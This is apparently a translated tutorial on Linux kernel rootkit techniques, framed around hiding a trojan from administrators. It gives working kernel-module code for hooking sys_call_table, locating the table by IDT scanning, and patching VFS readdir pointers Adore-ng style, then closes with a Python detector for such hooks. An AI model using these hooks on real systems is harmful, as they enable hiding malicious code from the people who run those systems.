About System Call hijacking

Source: Internet
Author: User

To hide a trojan so that the system administrator does not discover it, it is usually necessary to intercept system calls. In most cases this is done by modifying the system call table to hijack the system call.

The following is a typical module for intercepting system calls:

Module 1:
#include <linux/kernel.h>
#include <linux/module.h>
#include <sys/syscall.h>        /* SYS_mkdir; minimal header set (assumed) */

MODULE_LICENSE("GPL");

extern void *sys_call_table[];  /* sys_call_table is exported, so we can access
                                   it. But on some systems this will cause problems */
int (*orig_mkdir)(const char *path);  /* the original system call */

int hacked_mkdir(const char *path)
{
    return 0;  /* everything is OK, but the new system call does nothing */
}

int init_module(void)  /* module setup */
{
    orig_mkdir = (int (*)(const char *))sys_call_table[SYS_mkdir];
    sys_call_table[SYS_mkdir] = (void *)hacked_mkdir;
    return 0;
}

void cleanup_module(void)  /* module shutdown */
{
    sys_call_table[SYS_mkdir] = (void *)orig_mkdir;  /* set the mkdir syscall back to the original one */
}

The premise of this method is that the system must export the sys_call_table kernel symbol. In the 2.6 kernel and some 2.4 kernels (such as Red Hat AS 3), sys_call_table is no longer exported, so the address of the system call table cannot be obtained in a module through a simple extern void *sys_call_table[];.

Fortunately, even if the kernel does not export sys_call_table, its address can still be found in memory. The implementation is shown below:

Module 2 (tested on 2.4 and 2.6 kernels):
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>        /* current */
#include <linux/unistd.h>       /* __NR_mkdir; minimal header set (assumed) */

MODULE_LICENSE("GPL");
MODULE_AUTHOR("xunil@bmy");
MODULE_DESCRIPTION("Different from others, this module automatically locates the entry of sys_call_table!");

unsigned long *sys_call_table = NULL;
asmlinkage int (*orig_mkdir)(const char *, int);

/* Layout of one 8-byte IDT gate descriptor on i386 */
struct _idt
{
    unsigned short offset_low, segment_sel;
    unsigned char reserved, flags;
    unsigned short offset_high;
};

unsigned long *getscTable(void)
{
    unsigned char idtr[6], *shell, *sort;
    struct _idt *idt;
    unsigned long system_call, sct;
    unsigned short offset_low, offset_high;
    char *p;
    int i;

    /* Get the interrupt descriptor table: sidt stores the 16-bit limit
       followed by the 32-bit base address into idtr[] */
    __asm__("sidt %0" : "=m" (idtr));

    /* Get the address of system_call: gate 0x80 of the IDT, 8 bytes per gate */
    idt = (struct _idt *)(*(unsigned long *)&idtr[2] + 8 * 0x80);
    offset_low = idt->offset_low;
    offset_high = idt->offset_high;
    system_call = (offset_high << 16) | offset_low;

    shell = (unsigned char *)system_call;
    sort = (unsigned char *)"\xff\x14\x85";  /* opcode bytes of "call *sys_call_table(,%eax,4)" */

    /* Get the address of sys_call_table: scan the first 100 bytes of
       system_call for that opcode pattern */
    for (i = 0; i < (100 - 2); i++)
        if (shell[i] == sort[0] && shell[i + 1] == sort[1] && shell[i + 2] == sort[2])
            break;

    p = (char *)&shell[i];
    p += 3;                     /* the 4-byte table address follows the 3 opcode bytes */
    sct = *(unsigned long *)p;

    return (unsigned long *)sct;
}

asmlinkage int hacked_mkdir(const char *pathname, int mode)
{
    printk("PID %d called sys_mkdir!\n", current->pid);
    return orig_mkdir(pathname, mode);
}

static int __init find_init(void)
{
    sys_call_table = getscTable();
    orig_mkdir = (int (*)(const char *, int))sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir] = (unsigned long)hacked_mkdir;
    return 0;
}

static void __exit find_cleanup(void)
{
    sys_call_table[__NR_mkdir] = (unsigned long)orig_mkdir;
}

module_init(find_init);
module_exit(find_cleanup);

getscTable() is the function that finds the address of sys_call_table in memory. Every system call enters the kernel through the int 0x80 interrupt. The Interrupt Descriptor Table (IDT) maps each interrupt vector to its interrupt service routine, and for system calls the operating system registers system_call as that routine. The system_call function looks up and calls the corresponding system call service routine in the system call table, indexed by the system call number. The idtr register holds the start address of the IDT, and the instruction __asm__("sidt %0" : "=m" (idtr)) reads that start address. From the pointer obtained this way you can locate the descriptor of the int 0x80 interrupt and then compute the address of the system_call function. Disassembling system_call shows that it dispatches to the system call function through sys_call_table. Therefore, you only need to find the machine code of the call *sys_call_table(,%eax,4) instruction inside system_call to obtain the entry address of the system call table.

The Adore-ng rootkit provides a new method for intercepting system calls related to the file system. Simply put, this method intercepts them by modifying the function jump table of the VFS file system (the f_op table of an open file) instead of the system call table.
The implementation is as follows:

Module 3 (tested on 2.4 and 2.6 kernels):
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/fs.h>           /* struct file, filp_open, filldir_t */
#include <linux/err.h>          /* IS_ERR */
#include <linux/fcntl.h>        /* O_RDONLY; minimal header set (assumed) */

MODULE_AUTHOR("xunil@BMY");
MODULE_DESCRIPTION("By utilizing the VFS filesystem, this module can capture system calls.");
MODULE_LICENSE("GPL");

char *root_fs = "/";

typedef int (*readdir_t)(struct file *, void *, filldir_t);
readdir_t orig_root_readdir = NULL;

/* Replacement readdir: logs, then hands off to the filesystem's real readdir */
int myreaddir(struct file *fp, void *buf, filldir_t filldir)
{
    int r;
    printk("<1>You got me partner!\n");
    r = orig_root_readdir(fp, buf, filldir);
    return r;
}

/* Open the directory p and overwrite the readdir pointer in its f_op table.
   f_op is shared by every file of that filesystem, so the change affects all
   directory listings on it, not just this open file. */
int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
{
    struct file *filep;
    filep = filp_open(p, O_RDONLY, 0);
    if (IS_ERR(filep))
        return -1;
    if (orig_readdir)
        *orig_readdir = filep->f_op->readdir;

    filep->f_op->readdir = new_readdir;
    filp_close(filep, 0);
    return 0;
}

int unpatch_vfs(const char *p, readdir_t orig_readdir)
{
    struct file *filep;
    filep = filp_open(p, O_RDONLY, 0);
    if (IS_ERR(filep))
        return -1;
    filep->f_op->readdir = orig_readdir;
    filp_close(filep, 0);
    return 0;
}

static int patch_init(void)
{
    patch_vfs(root_fs, &orig_root_readdir, myreaddir);
    printk("<1>VFS is patched!\n");
    return 0;
}

static void patch_cleanup(void)
{
    unpatch_vfs(root_fs, orig_root_readdir);
    printk("<1>VFS is unpatched!\n");
}

module_init(patch_init);
module_exit(patch_cleanup);
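Both hooking methods above share one observable property a defender can use: the replaced pointer, whether a sys_call_table slot or a directory's f_op->readdir, now points into a loaded module rather than into the kernel's own text. The following Python check is an added example (not from the original article or from Adore-ng) that audits such a pointer snapshot against a System.map; the System.map excerpt, the pointer values and the labels are constructed sample data for a 32-bit kernel.

```python
import re

# Constructed System.map excerpt (sample addresses, not from the page).
SYSTEM_MAP = """\
c0100000 T _text
c0105a40 T system_call
c0143ab0 T sys_mkdir
c0143b20 T sys_getdents64
c0150c10 T ext3_readdir
c02e8000 T _etext
c02e9000 D sys_call_table
"""

# Constructed snapshot of live pointers as a trusted debugger would report them:
# {label: (address, expected symbol or None)}; 0xd0... lies in the module area.
SNAPSHOT = {
    "sys_call_table[__NR_mkdir]": (0xd08a1000, "sys_mkdir"),
    "sys_call_table[__NR_getdents64]": (0xc0143b20, "sys_getdents64"),
    "root_dir f_op->readdir": (0xd08b2040, None),
    "ext3_dir f_op->readdir": (0xc0150c10, None),
}

def parse_system_map(text):
    """Return {symbol: address} from System.map 'addr type name' lines."""
    syms = {}
    for line in text.splitlines():
        m = re.match(r"^([0-9a-fA-F]+)\s+\S\s+(\S+)$", line.strip())
        if m:
            syms[m.group(2)] = int(m.group(1), 16)
    return syms

def check_pointer(label, addr, syms, expected=None):
    """Flag a pointer outside _text.._etext (where a module-resident hook lands)
    or one that resolves to a different symbol than the slot should hold."""
    if not (syms["_text"] <= addr < syms["_etext"]):
        return (label, "HOOKED", "outside kernel text (module address?)")
    # Highest symbol at or below addr, i.e. the function the pointer lands in.
    sym = max((a, n) for n, a in syms.items() if a <= addr)[1]
    if expected and sym != expected:
        return (label, "HOOKED", f"resolves to {sym}, expected {expected}")
    return (label, "OK", sym)

def audit(snapshot, syms):
    """Run check_pointer over every entry of a snapshot."""
    return [check_pointer(l, a, syms, e) for l, (a, e) in snapshot.items()]

if __name__ == "__main__":
    for label, verdict, detail in audit(SNAPSHOT, parse_system_map(SYSTEM_MAP)):
        print(f"{verdict:6} {label}: {detail}")
```

The text-range test catches both modules above regardless of which slot they patch; the symbol comparison additionally catches a hook that was placed inside kernel text by redirecting one slot to a different built-in function.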